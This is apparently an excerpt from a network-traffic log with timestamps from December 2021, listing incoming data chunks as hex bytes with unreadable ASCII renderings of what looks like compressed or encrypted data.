                                                                                              2021-12-13 23:57:17 UTC6050INData Raw: 41 c2 40 a0 dc 89 d0 af 04 9b c4 b8 96 3c 0c fa 5c d2 50 b0 f7 e2 a9 c1 6b 80 3a 16 8b 4e 81 fb 19 46 5e 87 79 12 87 a9 21 4c 43 39 da 75 1b 58 b1 96 35 fa 44 25 88 fb c4 4b e2 72 dd 16 73 b7 a7 c6 07 e7 96 61 ef 52 2f 0a 3f 4f 43 61 11 3e b7 08 21 25 25 f1 36 15 ef 71 f3 53 b8 d6 08 a5 19 1c de 37 11 9f b8 c0 79 f3 0c e8 9a f7 ae 22 45 62 b2 fe 40 ce 59 40 b7 3b 91 5f 3a cc 3c 97 b6 4e c4 75 1b 58 da a3 d0 d8 8e be 45 70 ef 2a 28 88 33 c6 e7 85 7a 0e c1 fb 4d 92 59 a4 55 75 43 7d 4e 6b 6e a2 c3 62 39 d2 d5 7f d6 2a 2c bb dc 1a 2e bf 8c 6c cf 87 7c 1d 14 df 57 2e 91 9e 19 7f 96 6f 30 be 9e 51 d1 36 61 e1 ce 94 94 13 ac 89 bd f7 c9 46 58 27 db b8 83 ad 9c c0 46 3c c9 fc 80 a2 20 9c 73 60 86 f5 d3 8e d9 23 24 5f 8a 92 c5 ad 12 45 dd 4a 53 1b 98 f3 49 5f eb
                                                                                              Data Ascii: A@<\Pk:NF^y!LC9uX5D%KrsaR/?OCa>!%%6qS7y"Eb@Y@;_:<NuXEp*(3zMYUuC}Nknb9*,.l|W.o0Q6aFX'F< s`#$_EJSI_
                                                                                              2021-12-13 23:57:17 UTC6051INData Raw: 5a 93 ed 57 89 65 34 81 5b 11 33 33 71 fa ce f6 dc 6e 3c 9e 19 46 08 7a bd f0 6c a6 7f 3b fb c6 6a dc 14 3b 07 61 99 a0 38 e9 7a 85 c7 14 5d be 13 29 e2 9c fc df 3c 57 d6 87 e9 01 79 4c 86 19 40 0b 8c e4 2e 88 71 6c ce b7 76 a1 99 cb 45 37 f0 7f 8c 19 b0 b7 0b 16 8c 3a b7 b2 c1 9d 09 53 30 41 9f 14 66 e8 c0 45 e9 c5 b4 6f 3a 73 0c 0d 0f ec b9 99 fa ca 6c 43 6f f3 04 02 ea f5 70 8b 7e 8f f0 8e de f4 9a 23 b8 b5 31 db 39 fd 37 3f b4 90 42 ab 3c a9 99 f3 87 c5 3a 90 28 2f 17 a1 c2 57 3a 59 de 10 22 ad 36 2b f1 65 54 9f c4 aa 3d e9 cb ff 17 bf 49 8c ac 95 9a 8a bb fb 92 d8 df 6e a1 89 3b 8a 3b e7 4f 6f 79 bd 07 f6 ab 29 16 14 18 d0 e4 9a a8 5e 1d fb 4d 48 9b 0e ee 40 f3 51 e9 aa 47 90 44 c6 97 aa ef d2 1e 74 ed 02 4e c1 e7 d8 97 16 dd d0 2d 5b bc bb 68 75 b0
                                                                                              Data Ascii: ZWe4[33qn<Fzl;j;a8z])<WyL@.qlvE7:S0AfEo:slCop~#197?B<:(/W:Y"6+eT=In;;Ooy)^MH@QGDtN-[hu
                                                                                              2021-12-13 23:57:17 UTC6067INData Raw: 87 13 6e ae d7 cd c4 d5 83 61 93 2e a2 a9 a3 68 e1 69 36 e9 cb 2d 49 d9 ba 73 f0 bd 31 24 75 6e 2f dd a5 33 1b 37 16 54 10 1e a0 83 a2 ff 65 b6 10 39 14 a1 3f d8 9e c6 32 2b 73 89 a0 97 2e 04 4e 8c 59 03 28 87 bb 2e 3f f4 d3 7a 14 80 b3 99 07 9d dc 96 ef 76 e9 13 ea b7 23 8d 93 42 99 55 9e 14 26 97 e5 8f 10 2c 19 ca 2b 8c 2e 2e 58 e2 dd 64 73 a1 d7 3b 47 64 03 3e 00 2e 39 2a f1 69 f3 ff b4 3d 2f 15 eb 92 d6 e0 73 cc 27 c7 93 97 85 c6 6e 13 20 72 5d f1 0b 62 de 26 dc 3c b8 f9 66 c4 f4 79 c3 60 b3 f3 fe ff ee 69 26 11 d8 49 d7 d2 ce d3 c1 c4 e5 43 07 d9 67 48 e7 39 84 49 37 43 f2 b8 4b 7c 1f 62 14 6d c0 d4 ec 4d a2 6c b0 76 37 44 6c 51 34 7f ca aa 95 54 5c 60 36 22 d0 5b a9 68 ec f5 80 aa 7d 4c b9 a2 2d e8 ec 97 ec 26 ef 2b 86 7e c5 d7 c2 4a b5 ae 8a 10 21
                                                                                              Data Ascii: na.hi6-Is1$un/37Te9?2+s.NY(.?zv#BU&,+..Xds;Gd>.9*i=/s'n r]b&<fy`i&ICgH9I7CK|bmMlv7DlQ4T\`6"[h}L-&+~J!
                                                                                              2021-12-13 23:57:17 UTC6068INData Raw: 45 fe 1c 16 b7 dc 28 c9 aa 9d 8d e3 48 da 9c 8e 9f 44 af 19 00 b9 f0 3b 1d aa 66 5d 24 a7 bb 25 38 51 e8 c6 b5 4c 82 14 1f f0 09 61 f8 b3 2e 1b bc e7 05 18 83 45 20 93 84 0d 6f d9 36 6c 2c 39 4a 66 16 be 33 77 b6 d0 5f 07 fd 78 8a 4f 50 f6 4d 5a a0 10 1d bf c3 d8 b4 65 6e 12 b6 18 48 da a5 ad c0 23 be 96 46 63 79 78 a0 3e 08 b9 97 20 7a 26 77 ca 67 c9 74 28 7f a1 5b a5 b0 20 cd 68 ad d4 98 54 b7 3d 26 10 2a 77 24 e5 03 57 9e ec 07 da d0 fd e6 51 e9 76 df ba f6 97 0a a4 f7 62 2b d3 74 a0 41 e9 26 b2 bb 9e c2 3a ae 4e 76 32 19 2e 3c 5f 43 d6 db aa 37 e3 ff e6 7e 99 e1 f9 26 fc c4 c6 2b 12 6c 11 ca c4 46 7e 6e 7e dc c9 f5 c8 cc ed 3c 23 5b c9 39 33 b9 d5 9e 49 c9 00 63 af 0c b9 19 cf 0c 1c ec 05 5b 71 bb de 7a 43 fe 9c 33 62 cb 20 e4 4a eb 02 d0 8f 3a d0 65
                                                                                              Data Ascii: E(HD;f]$%8QLa.E o6l,9Jf3w_xOPMZenH#Fcyx> z&wgt([ hT=&*w$WQvb+tA&:Nv2.<_C7~&+lF~n~<#[93Ic[qzC3b J:e
                                                                                              2021-12-13 23:57:17 UTC6084INData Raw: 72 8c d5 90 ea 17 44 21 8c 7e 5d ed 27 e4 33 93 7e f4 e2 84 d7 45 66 46 65 06 c1 c5 51 6e 12 4a 3a e8 56 6e a0 24 09 85 c6 b0 14 3b 15 5c 83 52 13 c2 72 3f d4 f1 48 82 1d ce e9 1b 47 3e b6 76 cc 78 83 c5 bf 53 80 17 8a 3b 97 1b e1 be 23 3e 9f 04 dc a0 ab a9 d5 b0 77 b5 87 11 15 80 a6 53 ff 65 fd ec 5d ce 41 8c bc 4e d2 63 4e 39 70 24 09 30 f0 fa bf 29 55 72 b8 6b e2 2c 14 33 a1 7d 0a f1 6b cc 5c f9 ef 79 41 af e5 41 ee 55 ae a9 e2 56 2c 81 b4 cb aa 16 a0 5e 86 c6 a7 52 7b 93 2f 87 9d e0 e1 31 b5 90 ea 1f 91 32 62 4b 63 e0 c1 8e 8f 9c 1d 5d 83 51 e7 6f b8 8b 02 02 8f 07 2a 91 f1 e9 f9 e2 aa 0a 43 42 06 83 0a f3 ba 3a 55 01 8b 5a 7f cd a3 d5 09 05 89 0a a7 15 a0 fb 68 7c 46 e0 9c 25 5e 7e 2a 67 5c 93 b9 ac 3a 20 68 b1 89 4c ee dc ed 04 22 b7 eb f1 1c f9 32
                                                                                              Data Ascii: rD!~]'3~EfFeQnJ:Vn$;\Rr?HG>vxS;#>wSe]ANcN9p$0)Urk,3}k\yAAUV,^R{/12bKc]Qo*CB:UZh|F%^~*g\: hL"2
                                                                                              2021-12-13 23:57:17 UTC6085INData Raw: a6 9b a5 13 4a 4e a9 42 2b 35 a8 80 28 5d b7 e8 0f 74 ad d5 00 78 ae 33 04 ec 45 86 b2 a4 ca 22 5c 73 17 19 86 b4 33 2f 49 92 80 e7 30 23 78 22 84 eb 9b 0f 96 c6 62 da 68 95 42 fd ed 4b 0b 36 db 37 c2 6d 3a 13 be 83 7d 3e 64 ff fa f6 dd 13 ec 7f 08 43 ec 6f b7 9e 0d bf e1 06 ef 90 76 65 3d c9 fe b7 45 26 78 bc d5 62 77 69 e5 a2 5f fd 37 f1 25 77 41 37 a6 10 e4 24 b9 05 a5 40 62 0f f6 b6 ec 1d 91 8b c0 97 82 52 0c ca 81 d2 93 ff e9 6d 74 e2 82 2c d2 6d b1 7d 17 ff 10 94 81 a2 bf 10 54 55 20 11 82 31 39 26 e9 d9 74 2f fd 91 cf bc 01 80 6a 7f 71 cb de 7f d1 19 fe af e8 7e 5e 99 43 ae dd c7 80 7f d2 94 ee f3 8f c9 df 1e 72 28 db 34 31 e3 8e aa c0 90 fd b4 6a b9 c5 48 0a d5 20 5f 61 5c 64 bf 90 1e 90 69 55 ca 7d e3 fb a1 b8 a3 60 c1 56 3f df 59 9e f5 35 9e d7
                                                                                              Data Ascii: JNB+5(]tx3E"\s3/I0#x"bhBK67m:}>dCove=E&xbwi_7%wA7$@bRmt,m}TU 19&t/jq~^Cr(41jH _a\diU}`V?Y5
                                                                                              2021-12-13 23:57:17 UTC6101INData Raw: 38 5f 67 01 51 99 79 9d f4 05 a3 c8 78 87 e8 5b 88 2c 1e bd 4a 99 fc 56 cc df 97 48 e8 6a ce e5 e7 08 55 44 cb 52 2c 59 03 02 c6 d0 8f e2 c2 e9 cd 0e 19 87 03 4d ba 47 1b 18 6e 9a 61 5b 61 91 92 4d b8 02 2a 32 c8 66 32 7b 79 a1 57 6d 57 47 8b 40 40 6e ea 4b 43 94 a2 e5 4e a4 25 c3 52 a8 f1 b5 42 aa 5a 94 75 6e 1a 3e c4 6a d4 15 0a 64 0c 15 10 21 d7 d2 25 ab 2e df da 9e 98 07 6b ef bf 4a a1 ad 35 00 36 c6 d5 1d aa d3 b3 ed 7a 53 dc 60 21 d2 5b bf 95 47 44 6c 4e 2d 7d 62 3e 46 78 e8 b1 86 19 1a b4 59 5a 0a a1 ac 1e 0e c3 3d 75 2e 73 ab 53 26 13 fa 15 d8 95 4d 1e 9b 66 70 44 b2 bb 05 51 9b 09 84 5e bf 66 50 8c eb b5 9f ce 37 b5 19 c0 2d f1 66 61 f5 63 44 a3 ee 4b cd b3 f1 4c 66 ba 0d 8c bd 10 98 d2 82 5f 10 f2 19 66 15 4e b1 95 00 9a 8f f9 4a b7 38 d9 7e b8
                                                                                              Data Ascii: 8_gQyx[,JVHjUDR,YMGna[aM*2f2{yWmWG@@nKCN%RBZun>jd!%.kJ56zS`![GDlN-}b>FxYZ=u.sS&MfpDQ^fP7-facDKLf_fNJ8~
                                                                                              2021-12-13 23:57:17 UTC6102INData Raw: 73 27 06 4c 9a a8 90 18 85 21 55 08 db 3d f1 78 7e 69 fb 88 5c 42 be a3 ff 9a e4 9a b9 c9 75 8b b7 05 50 42 14 0d 7e eb a3 8d 64 a2 fc 60 c9 74 f1 e6 a3 c5 d9 9a 8e 20 33 25 63 5e 31 1c d8 ef 56 f0 c4 15 98 fe 63 37 b2 a7 12 27 56 b5 61 00 e3 6c 06 13 c1 6f af af 26 5f af 89 21 47 51 54 04 da 90 80 36 13 9f 1d e2 1b cd 02 db 3c 18 81 00 ce cd cc d3 20 f5 dc 19 71 51 b6 bb 92 b7 fa 02 9b 0a 45 08 e2 cd 7e ed 0a be 35 19 9c 9a 8c 55 5c 37 77 fd e5 3e 70 40 2c 89 0b 00 30 ac 3e 10 55 78 91 71 ee ce e2 00 ec 6b ac 40 85 66 c3 d1 ee 3e 55 7b ed 87 1a 86 72 21 87 f1 6d 1d 94 06 b5 e1 8f 08 29 3f fb 41 9d d3 9c 33 70 ad e6 54 11 eb 1f 7a 42 d0 fb d0 09 11 1b 58 8d ac 12 c4 f8 e9 f6 56 ca b4 58 32 db bd 8e f3 86 59 6d 68 b9 03 f4 9d c7 4c 07 30 d3 3f c3 46 a7 7a
                                                                                              Data Ascii: s'L!U=x~i\BuPB~d`t 3%c^1Vc7'Valo&_!GQT6< qQE~5U\7w>p@,0>Uxqk@f>U{r!m)?A3pTzBXVX2YmhL0?Fz
                                                                                              2021-12-13 23:57:17 UTC6118INData Raw: 40 21 02 38 8c a0 2a 36 72 40 8b 81 a8 55 d5 f6 ff cb 91 fc 88 5d 1e d7 7d 77 fb 55 17 cd b6 f0 68 a3 6b 6a 88 6f 13 d1 05 37 7a 0f dc df bd df b6 88 1b bb ed 24 ac ac 54 34 5f 91 e6 0a 90 d6 77 4d 5e 98 a7 8d 6f 7a df 04 f5 2b 59 24 0a 60 da 52 c2 9a 3c 00 ea 6e 27 38 a1 06 cf 15 d1 7f 02 18 35 3b 89 6c e3 21 07 80 01 19 68 29 0c cc e3 c2 f7 9d e1 0f 14 9d 34 2b 5f 7d ef 69 7d e2 dd 69 a2 36 8d 76 a5 29 41 5a 66 15 7e d5 13 a1 20 6e 5f 60 5a 1a 64 fa 8a f2 ad 72 64 1e c3 99 c6 6e bc 4f 16 c3 e5 3a 50 26 b5 09 56 46 d2 c5 d1 f8 2b a1 2f 38 fb 6f f7 cb cf 5b ef d1 1d ae ad 4f 70 a7 e4 dd 62 77 3e d7 89 8a e7 ec 1b 2f df 86 e4 b0 2c dc 8a bc cc a7 1f 56 7d 1d a3 ec 45 95 0c 89 e3 59 eb 44 8b 9f e4 4d f2 61 37 e9 62 dc 7d 15 43 64 5a 03 d1 a5 d7 35 be 68 9d
                                                                                              Data Ascii: @!8*6r@U]}wUhkjo7z$T4_wM^oz+Y$`R<n'85;l!h)4+_}i}i6v)AZf~ n_`ZdrdnO:P&VF+/8o[Opbw>/,V}EYDMa7b}CdZ5h
                                                                                              2021-12-13 23:57:17 UTC6119INData Raw: 56 3e 66 24 e5 f6 ba bf 3d 67 52 8f cc b3 97 3e 51 93 30 07 45 1a 34 ee 22 6c 3c a9 f6 df f5 69 4b c8 fc 77 51 a9 9a 88 bf 98 42 8a 84 71 f1 a6 21 8d f3 72 13 0c 5d 30 d3 7e 3b 5a ae 6f 11 dc a9 80 20 5d 21 17 c0 d7 52 87 2e 0a aa bf 8c d3 78 52 4d fc d3 0b f9 30 60 f4 48 52 14 09 87 7f 17 de 66 a2 5d 16 ca 60 d5 dd aa 58 18 c1 75 80 ee 67 83 58 fd 57 d6 13 43 10 59 cc f5 99 3d a1 96 51 83 eb 6b 49 23 d5 b4 6c 37 03 72 77 5b 0b be 3b f9 49 c8 e3 23 11 28 ff 56 d2 56 29 14 49 04 20 81 56 12 6e 83 91 4b 48 ac 13 3a 9f aa ce d5 f9 fe 31 86 81 9f 88 05 87 53 39 c4 50 27 37 31 10 6b 3e c3 a9 b8 96 76 74 75 71 36 23 d4 b9 f0 4a 9d 17 02 eb f6 45 14 d6 4e c1 35 32 7c 44 a7 e7 2a 3d cd 9b 49 af c9 17 f8 dd b0 5c cd 81 fb 90 ba 72 ca a3 e3 5f 7b 10 2b 17 ac 3d a8
                                                                                              Data Ascii: V>f$=gR>Q0E4"l<iKwQBq!r]0~;Zo ]!R.xRM0`HRf]`XugXWCY=QkI#l7rw[;I#(VV)I VnKH:1S9P'71k>vtuq6#JEN52|D*=I\r_{+=
                                                                                              2021-12-13 23:57:17 UTC6135INData Raw: 9c dd 8b fa fe b7 7e 57 e9 86 98 a2 e1 38 76 88 24 4b 36 df 92 cd c0 4e cf 5b 0a b6 b3 4a d1 78 85 0e ce ba 6f 9e ee ea dd 9d 86 86 1f 66 da 59 a0 37 03 20 d7 a5 e9 06 66 f5 0f 82 30 e4 98 50 d6 2a 51 bc cf 0f 7e 7a 97 da d1 7d c1 11 92 d8 c0 47 6c bb d0 18 70 5c 57 73 c4 be f0 fa d5 18 f3 1d f0 08 6f 82 92 a3 ee 41 b3 ae 29 7c 62 04 8a a2 50 4e 65 84 b9 94 54 36 12 c4 c9 8a 35 4c 41 65 55 be 2c 8e d7 1f fe 62 83 a6 ea f5 1b 23 38 c8 20 f5 36 54 25 45 c4 3b d4 d7 58 bd b9 01 51 04 9f 11 7f 4f 29 e3 c7 7a 6b 4e 49 a7 55 a0 8f d0 91 0c 46 0f 14 34 5a ca 41 ab 98 e8 63 a6 fb 5f 08 d4 40 91 8b e7 60 32 a8 5c d0 8f e3 7d f8 d6 e4 27 71 01 13 c2 b2 94 6f d2 ac 97 ba 2c 41 75 6d c6 8c 0f af de ba 92 12 5d 66 fb f2 ee fe b4 4d fd 7c a3 80 77 22 18 f0 9b d1 dc a3
                                                                                              Data Ascii: ~W8v$K6N[JxofY7 f0P*Q~z}Glp\WsoA)|bPNeT65LAeU,b#8 6T%E;XQO)zkNIUF4ZAc_@`2\}'qo,Aum]fM|w"
                                                                                              2021-12-13 23:57:17 UTC6136INData Raw: 9f 3c 9f f6 37 a1 09 b6 1f 3f 4b 72 6e fc e9 9e f5 2d c5 9a ac 74 cc 94 9f ea cd b2 24 37 53 ea 7e 96 a8 14 80 c7 83 6f 6b 3a 63 c9 6c f5 b6 65 fc 4a f7 b0 d3 ef c9 0c 96 64 fb 97 55 b0 73 0c b6 f4 27 57 4d 36 fe 14 37 30 e6 95 be 0f 83 fa 9d a8 75 e2 b2 fc 16 9b b5 98 c6 44 ab 06 be 7e d7 aa fd a1 4c cd 2f 3a db fa 13 8e 3c 47 60 a4 f5 19 8a d2 d9 e7 93 a9 3c 9f 08 66 a6 87 1b 89 f4 e0 9a f0 76 c0 86 93 26 7c 52 3a 45 d5 ad 4a 3f 7c 0e 3d a4 5a 91 01 d7 57 85 74 a4 b1 3b bd cc 1f b8 0d 9f fa ab e3 46 37 98 09 ec 70 25 d6 34 c4 7d 2f e1 e7 66 5c 88 2f c2 54 20 a5 cf 04 ef fa 8c 10 e0 45 16 3a a7 91 8e 10 14 ac c2 46 a0 67 13 e9 e5 cc 5f 44 fb 66 0f 04 28 d5 f1 05 a5 e2 a7 01 40 6d 7c 52 27 95 02 fa 5c a6 28 14 8e 60 d4 f1 49 9b ac f5 1c 88 63 d1 16 93 c0
                                                                                              Data Ascii: <7?Krn-t$7S~ok:cleJdUs'WM670uD~L/:<G`<fv&|R:EJ?|=ZWt;F7p%4}/f\/T E:Fg_Df(@m|R'\(`Ic
                                                                                              2021-12-13 23:57:17 UTC6152INData Raw: 32 7b 0d 52 3a 1c d6 bf e0 ce 2f 0b fd 34 5b 15 48 34 4b d6 9f 84 21 bb e1 61 19 30 e6 ec c5 b5 9f 44 74 25 4f aa 01 66 83 58 f9 63 98 0f 31 80 88 3c a8 10 b0 d4 ff 89 8a a7 11 7e ae ce 9e 9b ee b3 3b 98 cf 48 21 28 6c ff a2 20 65 55 89 7d 3d 2e a5 ee c6 74 bd 58 45 d1 e2 07 01 30 92 d5 54 97 f8 36 88 fc 99 0c 34 70 ea 48 30 3a 18 31 2b cc 1b 35 8f 62 bc dd ef f2 76 ce 96 dd fb 07 c4 80 bf b3 63 fc 34 9b 0b 7c a3 59 81 86 d1 d4 a7 93 c0 0e a7 ea a4 93 38 4f df 79 38 28 6c 67 2e 32 8a ce 31 ff b4 38 7f e0 be a3 f5 37 69 1a 53 db 62 fa df 3a fa c2 6e 63 c3 86 4c 5e 12 dc fe db cc 6a 97 ee 3e f3 30 3f a7 e0 a0 a9 be 45 01 60 77 45 bf 98 c0 12 0e 1f 24 49 eb 92 50 6a 03 08 0b 80 3f ec 61 d1 88 de 73 74 4a 8b 7e 69 59 23 e5 a9 42 e7 5d a8 f3 3b 4f 9b 32 88 3d
                                                                                              Data Ascii: 2{R:/4[H4K!a0Dt%OfXc1<~;H!(l eU}=.tXE0T64pH0:1+5bvc4|Y8Oy8(lg.2187iSb:ncL^j>0?E`wE$IPj?astJ~iY#B];O2=
                                                                                              2021-12-13 23:57:17 UTC6153INData Raw: 73 83 8a 68 91 8b f4 1e 6a 6b 56 1c e6 08 cd f5 b0 38 e0 30 cc 16 69 d2 0a b4 9e 16 49 22 11 bc 38 35 19 aa 32 21 f2 7d 8f 19 19 15 73 bf d1 a9 2d 97 df 06 c5 eb 5b b1 9c b2 49 d9 31 2f f4 a9 6c cd 1e 0c 21 ca 96 de 86 82 9a f3 5a b5 0b 97 de 9a 0a 16 40 e4 92 c1 1a a3 92 8f 7c 62 fb 49 27 9f 64 80 db 7b 5b 1d 3c 23 d7 f8 98 f4 95 98 bd 68 1b 7c 07 82 49 d7 89 19 25 b5 68 14 b9 a5 38 a9 b8 9d d3 89 c5 dd 6d 6c c3 4d 12 c8 9f 46 f7 9b 0b c3 af d6 8b d5 dc fa ba 0b 5c 91 b7 bc 9f 84 cc f5 b4 21 f0 e3 c6 c6 33 79 ba f7 41 60 b9 8e 03 25 06 ce b6 12 2d 57 e0 0f c2 45 07 88 8d e9 17 0a e8 38 00 41 b6 cd 4b 13 eb 09 5a 43 de 68 36 66 ba 44 22 72 34 ad 52 84 04 5c 0e e3 af 89 7f a4 2a bc a8 9a 62 bd 03 66 28 08 39 04 ff 2c 4f 2b 16 ba 2d ee 07 52 81 b2 29 a7 2b
                                                                                              Data Ascii: shjkV80iI"852!}s-[I1/l!Z@|bI'd{[<#h|I%h8mlMF\!3yA`%-WE8AKZCh6fD"r4R\*bf(9,O+-R)+
                                                                                              2021-12-13 23:57:17 UTC6169INData Raw: a4 30 4c 03 28 48 cd 73 29 ff 65 d0 38 dc 7c a0 10 4c b6 cc 64 bf 03 0a e1 b7 b0 f4 75 cb 1a 2e 6e 8f d9 53 d0 b9 0a 66 84 83 be da 50 26 66 c8 6c f2 d0 5b 28 c3 a7 44 18 1a 9a 63 b2 95 ef 7e f7 48 03 22 e1 a8 0a 5c 87 a1 8d c1 32 cc cd f0 e9 b3 53 d2 ab ba 7f 7f 2a 0b 6d 3a 34 7a e6 ce 78 b6 4e 2b eb 67 96 f3 91 d1 1c 27 ba 96 f7 06 13 d6 81 14 09 84 ca da cc 3a aa 68 8e c6 bd 45 62 40 9e fb 43 9a 4d 26 c4 28 c9 78 4e f9 ae 68 fc 9d dd 6f c3 dd 35 fb a5 72 0d 4c 07 86 f3 e3 bc c9 2e a5 7e 4a ae b5 12 88 e6 95 73 d1 f4 4c 6d b3 5e 37 49 72 62 15 cb d9 88 21 dd 10 d5 ce e9 dc 69 57 51 7b 95 f9 9a c3 1d e6 8a 2e 94 c0 b8 03 d9 3f a5 83 68 a0 cd 8f 39 97 02 9c ce 08 fb 71 8a 98 b2 37 50 41 e4 e1 4f 04 fb 93 f0 3c ae f1 97 da 62 29 e8 a4 26 59 b8 3c 4f a4 a9
                                                                                              Data Ascii: 0L(Hs)e8|Ldu.nSfP&fl[(Dc~H"\2S*m:4zxN+g':hEb@CM&(xNho5rL.~JsLm^7Irb!iWQ{.?h9q7PAO<b)&Y<O
                                                                                              2021-12-13 23:57:17 UTC6170INData Raw: 61 bf f0 ce 68 59 01 a4 aa 6d e3 6b b7 53 ef 64 fd da a6 24 57 e9 92 de 87 35 00 71 66 0d ad 54 ac c5 ba ad 56 9c 25 16 ea 87 19 e0 aa 18 fa f7 80 77 21 d8 d4 b8 72 e0 79 82 ac bc b0 ad 3d a3 c3 87 de 32 31 ce 01 36 22 b6 2d 6a 8c cc e7 34 17 83 c2 04 f2 a2 65 3a 09 43 35 7a b9 51 83 0f 58 d5 2c ff 7c ea ef e3 ee 39 1a 2a 0b 06 28 9e 07 08 c5 d6 14 fd 8b f6 03 78 5b 38 3e f4 f1 16 d3 8d 9f 26 d1 08 f1 6c c7 61 46 9e bb 47 00 ed f2 00 5c 1c 00 98 fe 2d a2 c5 41 42 de 6f d5 be 3d 5f f1 ab f7 44 12 19 65 c4 b9 e6 3d 5c ca f6 02 9e d2 11 42 63 d2 ba 11 94 79 88 2c 39 d2 35 78 10 38 5e cc f9 42 65 a6 67 d5 a3 79 fb 82 67 d1 db d4 f0 49 95 a2 39 4b 41 00 5f 01 e0 f3 67 9e 2d 55 77 d4 c6 4a 37 a2 c8 97 07 ed 1f 56 80 89 f3 73 87 49 52 45 04 cb f2 eb a6 c9 dd f1
                                                                                              Data Ascii: ahYmkSd$W5qfTV%w!ry=216"-j4e:C5zQX,|9*(x[8>&laFG\-ABo=_De=\Bcy,95x8^BegygI9KA_g-UwJ7VsIRE
                                                                                              2021-12-13 23:57:17 UTC6186INData Raw: ea e2 d2 33 06 82 51 91 bf 65 df e4 53 ce 77 4f 24 69 6e d6 aa 6d 7c 68 dd a4 fe 31 56 05 28 bb e3 61 39 a5 6c fa 3b 30 3d 8d 3f 4d a3 63 27 5b 7c 33 ab 94 ec 38 d3 99 ed 5b 52 2b cf ce 24 25 a2 3a 58 df af 5d 1a 30 07 0c c2 e5 ca e6 1b b4 13 0a 3a c4 5d 48 e1 71 03 84 dc be 53 61 bc e5 5f 03 ad 00 cc 03 5c 53 9f 64 23 77 dd 0c ce c0 82 67 02 85 85 ef fc 3e 4a 92 58 48 6d ee 6d d8 21 e7 cd db 18 58 3a ba 6f 64 29 c0 2f 32 ce 3c 54 13 bf d8 b3 13 91 0f 88 15 36 4f 95 2f 89 6e 8e c8 0b 15 b6 94 3d e5 1f 79 8a 23 20 49 c9 78 aa df 95 e2 e7 4f 36 84 29 f5 c0 83 f0 ad 65 30 d3 e7 23 c8 87 4b 05 86 eb 71 14 aa 90 36 78 38 54 1a 49 ee 65 fa 61 59 65 99 b1 25 0f e8 72 7e 01 f7 10 ab fd 34 19 10 8e ca 9e 21 2e a2 18 85 77 44 ad 81 ff c1 c8 d1 98 cb 5b 54 9f cb 90
                                                                                              Data Ascii: 3QeSwO$inm|h1V(a9l;0=?Mc'[|38[R+$%:X]0:]HqSa_\Sd#wg>JXHmm!X:od)/2<T6O/n=y# IxO6)e0#Kq6x8TIeaYe%r~4!.wD[T
                                                                                              2021-12-13 23:57:17 UTC6187INData Raw: ef 8f 60 f5 9c 52 4f 77 ea 30 49 f0 89 d1 e3 28 51 46 ff 67 fb cf a3 11 59 6d 98 06 56 60 cd 2a 71 16 da 47 c9 89 02 95 8d 4a 68 20 93 27 7f 9d 34 83 cb e9 a1 8a ee 8a 29 a1 cd 34 e0 70 fa 1a 16 a0 b0 5f 32 09 67 cc 33 ee 2f 5b 06 90 1b 5d 3e bf 3d e6 87 0a c9 b5 87 fa ee 59 17 d4 2e 8a a1 f2 52 73 d8 07 fc f1 40 af 8a 0b 19 cc 4f 68 b0 44 9d 1f 57 bc d1 6c ea 24 00 74 6c ee cd bc e4 99 5c 5c 39 01 24 5f 2f 26 a7 6d 59 b1 72 62 d6 8c 66 f6 a7 8a 5a 13 ff 20 ac 58 aa 22 08 0a 1d 97 ff 62 b1 cd ed fa 93 96 f6 20 23 7b 6b b1 5e e2 48 fe ca 53 52 b7 2f 81 89 9f 97 b2 50 cd 4b 67 b8 42 39 cd 13 6e 4e 17 d9 13 3e c4 b5 10 e7 2d c8 b8 5e 25 a3 42 41 be 47 73 78 ec 52 58 b1 2f fb 41 eb d9 92 bd 34 c9 a0 4b 42 1f 0c b5 7b 32 ee 5b 28 46 10 80 4e 18 40 96 d3 e9 d2
                                                                                              Data Ascii: `ROw0I(QFgYmV`*qGJh '4)4p_2g3/[]>=Y.Rs@OhDWl$tl\\9$_/&mYrbfZ X"b #{k^HSR/PKgB9nN>-^%BAGsxRX/A4KB{2[(FN@
                                                                                              2021-12-13 23:57:17 UTC6203INData Raw: eb e4 e2 62 14 84 90 67 6b 06 47 da 98 cc 61 cc f6 a9 d4 72 9e 55 eb 7c 74 9f 90 23 66 3e 10 b4 2d 88 d5 dd c4 38 c7 93 72 a7 39 f3 5b 0d 93 bb 1e d0 2c 66 d1 5a 36 2c 2a 01 b9 be c2 24 52 f1 5c 7c 97 86 9f 26 ba 7b 0c f0 3e f4 41 4a 57 2f 74 e6 f5 62 60 9b 6c 60 77 bf 3d bd ef 23 99 2d d4 e3 c6 15 0a 50 d8 af 64 46 6c 2b 8f 63 a7 b8 2c b3 cf e9 4b 8c 2a 47 5d 88 56 67 70 84 f1 e6 97 9e b1 0b f6 dd d8 eb c9 a9 14 fe 50 76 6f ac 72 bf 21 d3 46 7d d3 79 13 d8 93 20 f1 ca ea 63 fc 74 10 99 a3 64 82 b2 2c 77 27 57 51 a8 a9 f0 3e 22 5d b0 dd 3a c0 ec 55 66 db fd 23 d0 cc ff 80 70 fd 23 14 fa 49 98 a9 6d e6 1a 28 23 6d 1d 51 9c 75 1b 24 e5 95 81 f6 4d be 75 84 76 7f 0c 58 3d 3f f6 75 59 3d 65 2e c8 b3 c0 4c 59 50 a4 50 6b 01 2c ba ba 12 3a 73 08 6f 70 07 f6 1e
                                                                                              Data Ascii: bgkGarU|t#f>-8r9[,fZ6,*$R\|&{>AJW/tb`l`w=#-PdFl+c,K*G]VgpPvor!F}y ctd,w'WQ>"]:Uf#p#Im(#mQu$MuvX=?uY=e.LYPPk,:sop
                                                                                              2021-12-13 23:57:17 UTC6204INData Raw: db 8d 21 2c 8e ee 91 27 39 99 11 51 d0 7c 88 40 07 48 78 cd bc 2b f3 9c 4b d2 a2 9d 39 9a 20 02 c8 01 07 25 a5 ec dd dc e6 15 3d ae 83 60 5d e4 eb 57 b4 d8 6c e4 87 52 9a c6 aa 13 16 b2 b0 95 0f 6a 28 7f 0f 03 ea 1e ad ef 16 fb 54 27 d5 cc 3b 16 af 73 4b 20 bf 87 94 38 1c 47 b9 12 cc 34 19 eb c3 c9 76 32 85 5e 03 38 2e 33 1d d3 90 9f b7 08 31 93 a9 f7 88 d2 da fa 38 c2 88 1e 87 47 14 5b 15 00 37 92 bb 9b 5a 20 3b 38 7e 0f bf 01 63 c1 ff 8f 30 45 e0 64 c0 0f 08 ad c9 36 73 ca 9a e6 a1 40 cf d5 4b 0e 63 e1 c2 a8 97 c1 43 d2 a1 35 ce 8b 66 69 f7 e6 00 32 fa aa 7b 78 b8 10 b1 c8 ae e2 1b 1d 60 05 24 e5 ef 63 e3 0a c4 8d 65 